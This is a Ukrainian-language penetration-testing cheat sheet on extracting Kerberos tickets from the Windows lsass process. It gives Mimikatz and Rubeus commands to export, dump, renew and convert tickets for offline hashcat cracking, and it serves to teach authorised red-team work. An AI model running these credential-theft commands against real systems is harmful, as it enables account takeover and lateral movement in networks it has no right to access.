Квитки в Windows керуються та зберігаються процесом lsass (Local Security Authority Subsystem Service), відповідальним за обробку політик безпеки. Для вилучення цих квитків необхідно взаємодіяти з процесом lsass. Неадміністративний користувач може отримати доступ лише до своїх квитків, тоді як адміністратор має привілей вилучати всі квитки на системі. Для таких операцій широко використовуються інструменти Mimikatz та Rubeus, кожен з яких пропонує різні команди та функціонал.

Mimikatz

Mimikatz - це універсальний інструмент, який може взаємодіяти з безпекою Windows. Він використовується не лише для вилучення квитків, але й для різних інших операцій, пов'язаних з безпекою.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus - це інструмент, спеціально розроблений для взаємодії та маніпулювання Kerberos. Він використовується для видобутку та обробки квитків, а також для інших пов'язаних з Kerberos дій.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Під час використання цих команд, переконайтеся, що заміните заповнювачі, такі як <BASE64_TICKET> та <luid>, фактичними закодованими у Base64 квитком та ідентифікатором входу в систему відповідно. Ці інструменти надають широкі можливості для керування квитками та взаємодії з механізмами безпеки Windows.

Посилання

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/